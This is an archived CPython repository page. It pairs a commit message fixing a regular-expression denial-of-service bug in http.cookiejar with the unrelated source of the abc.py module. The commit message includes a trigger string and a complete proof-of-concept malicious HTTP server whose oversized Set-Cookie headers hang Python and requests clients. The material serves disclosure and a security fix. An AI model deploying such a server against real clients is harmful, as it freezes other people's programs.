Staging
v0.5.1
https://github.com/python/cpython
Revision 55a6a16a46239a71b635584e532feb8b17ae7fdf authored by Victor Stinner on 03 April 2020, 01:37:32 UTC, committed by GitHub on 03 April 2020, 01:37:32 UTC
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.

(cherry picked from commit 1b779bfb8593739b11cbb988ef82a883ec9d077e)

Co-authored-by: bcaller <bcaller@users.noreply.github.com>
1 parent ed07522
Raw File
Tip revision: 55a6a16a46239a71b635584e532feb8b17ae7fdf authored by Victor Stinner on 03 April 2020, 01:37:32 UTC
bpo-38804: Fix REDoS in http.cookiejar (GH-17157) (#17344)
Tip revision: 55a6a16
abc.py
# Copyright 2007 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.

"""Abstract Base Classes (ABCs) according to PEP 3119."""

from _weakrefset import WeakSet


def abstractmethod(funcobj):
    """A decorator indicating abstract methods.

    Requires that the metaclass is ABCMeta or derived from it.  A
    class that has a metaclass derived from ABCMeta cannot be
    instantiated unless all of its abstract methods are overridden.
    The abstract methods can be called using any of the normal
    'super' call mechanisms.

    Usage:

        class C(metaclass=ABCMeta):
            @abstractmethod
            def my_abstract_method(self, ...):
                ...
    """
    funcobj.__isabstractmethod__ = True
    return funcobj


class abstractclassmethod(classmethod):
    """
    A decorator indicating abstract classmethods.

    Similar to abstractmethod.

    Usage:

        class C(metaclass=ABCMeta):
            @abstractclassmethod
            def my_abstract_classmethod(cls, ...):
                ...

    'abstractclassmethod' is deprecated. Use 'classmethod' with
    'abstractmethod' instead.
    """

    __isabstractmethod__ = True

    def __init__(self, callable):
        callable.__isabstractmethod__ = True
        super().__init__(callable)


class abstractstaticmethod(staticmethod):
    """
    A decorator indicating abstract staticmethods.

    Similar to abstractmethod.

    Usage:

        class C(metaclass=ABCMeta):
            @abstractstaticmethod
            def my_abstract_staticmethod(...):
                ...

    'abstractstaticmethod' is deprecated. Use 'staticmethod' with
    'abstractmethod' instead.
    """

    __isabstractmethod__ = True

    def __init__(self, callable):
        callable.__isabstractmethod__ = True
        super().__init__(callable)


class abstractproperty(property):
    """
    A decorator indicating abstract properties.

    Requires that the metaclass is ABCMeta or derived from it.  A
    class that has a metaclass derived from ABCMeta cannot be
    instantiated unless all of its abstract properties are overridden.
    The abstract properties can be called using any of the normal
    'super' call mechanisms.

    Usage:

        class C(metaclass=ABCMeta):
            @abstractproperty
            def my_abstract_property(self):
                ...

    This defines a read-only property; you can also define a read-write
    abstract property using the 'long' form of property declaration:

        class C(metaclass=ABCMeta):
            def getx(self): ...
            def setx(self, value): ...
            x = abstractproperty(getx, setx)

    'abstractproperty' is deprecated. Use 'property' with 'abstractmethod'
    instead.
    """

    __isabstractmethod__ = True


class ABCMeta(type):

    """Metaclass for defining Abstract Base Classes (ABCs).

    Use this metaclass to create an ABC.  An ABC can be subclassed
    directly, and then acts as a mix-in class.  You can also register
    unrelated concrete classes (even built-in classes) and unrelated
    ABCs as 'virtual subclasses' -- these and their descendants will
    be considered subclasses of the registering ABC by the built-in
    issubclass() function, but the registering ABC won't show up in
    their MRO (Method Resolution Order) nor will method
    implementations defined by the registering ABC be callable (not
    even via super()).

    """

    # A global counter that is incremented each time a class is
    # registered as a virtual subclass of anything.  It forces the
    # negative cache to be cleared before its next use.
    # Note: this counter is private. Use `abc.get_cache_token()` for
    #       external code.
    _abc_invalidation_counter = 0

    def __new__(mcls, name, bases, namespace):
        cls = super().__new__(mcls, name, bases, namespace)
        # Compute set of abstract method names
        abstracts = {name
                     for name, value in namespace.items()
                     if getattr(value, "__isabstractmethod__", False)}
        for base in bases:
            for name in getattr(base, "__abstractmethods__", set()):
                value = getattr(cls, name, None)
                if getattr(value, "__isabstractmethod__", False):
                    abstracts.add(name)
        cls.__abstractmethods__ = frozenset(abstracts)
        # Set up inheritance registry
        cls._abc_registry = WeakSet()
        cls._abc_cache = WeakSet()
        cls._abc_negative_cache = WeakSet()
        cls._abc_negative_cache_version = ABCMeta._abc_invalidation_counter
        return cls

    def register(cls, subclass):
        """Register a virtual subclass of an ABC.

        Returns the subclass, to allow usage as a class decorator.
        """
        if not isinstance(subclass, type):
            raise TypeError("Can only register classes")
        if issubclass(subclass, cls):
            return subclass  # Already a subclass
        # Subtle: test for cycles *after* testing for "already a subclass";
        # this means we allow X.register(X) and interpret it as a no-op.
        if issubclass(cls, subclass):
            # This would create a cycle, which is bad for the algorithm below
            raise RuntimeError("Refusing to create an inheritance cycle")
        cls._abc_registry.add(subclass)
        ABCMeta._abc_invalidation_counter += 1  # Invalidate negative cache
        return subclass

    def _dump_registry(cls, file=None):
        """Debug helper to print the ABC registry."""
        print("Class: %s.%s" % (cls.__module__, cls.__qualname__), file=file)
        print("Inv.counter: %s" % ABCMeta._abc_invalidation_counter, file=file)
        for name in sorted(cls.__dict__.keys()):
            if name.startswith("_abc_"):
                value = getattr(cls, name)
                print("%s: %r" % (name, value), file=file)

    def __instancecheck__(cls, instance):
        """Override for isinstance(instance, cls)."""
        # Inline the cache checking
        subclass = instance.__class__
        if subclass in cls._abc_cache:
            return True
        subtype = type(instance)
        if subtype is subclass:
            if (cls._abc_negative_cache_version ==
                ABCMeta._abc_invalidation_counter and
                subclass in cls._abc_negative_cache):
                return False
            # Fall back to the subclass check.
            return cls.__subclasscheck__(subclass)
        return any(cls.__subclasscheck__(c) for c in {subclass, subtype})

    def __subclasscheck__(cls, subclass):
        """Override for issubclass(subclass, cls)."""
        # Check cache
        if subclass in cls._abc_cache:
            return True
        # Check negative cache; may have to invalidate
        if cls._abc_negative_cache_version < ABCMeta._abc_invalidation_counter:
            # Invalidate the negative cache
            cls._abc_negative_cache = WeakSet()
            cls._abc_negative_cache_version = ABCMeta._abc_invalidation_counter
        elif subclass in cls._abc_negative_cache:
            return False
        # Check the subclass hook
        ok = cls.__subclasshook__(subclass)
        if ok is not NotImplemented:
            assert isinstance(ok, bool)
            if ok:
                cls._abc_cache.add(subclass)
            else:
                cls._abc_negative_cache.add(subclass)
            return ok
        # Check if it's a direct subclass
        if cls in getattr(subclass, '__mro__', ()):
            cls._abc_cache.add(subclass)
            return True
        # Check if it's a subclass of a registered class (recursive)
        for rcls in cls._abc_registry:
            if issubclass(subclass, rcls):
                cls._abc_cache.add(subclass)
                return True
        # Check if it's a subclass of a subclass (recursive)
        for scls in cls.__subclasses__():
            if issubclass(subclass, scls):
                cls._abc_cache.add(subclass)
                return True
        # No dice; update negative cache
        cls._abc_negative_cache.add(subclass)
        return False


class ABC(metaclass=ABCMeta):
    """Helper class that provides a standard way to create an ABC using
    inheritance.
    """
    pass


def get_cache_token():
    """Returns the current ABC cache token.

    The token is an opaque object (supporting equality testing) identifying the
    current version of the ABC cache for virtual subclasses. The token changes
    with every call to ``register()`` on any ABC.
    """
    return ABCMeta._abc_invalidation_counter
back to top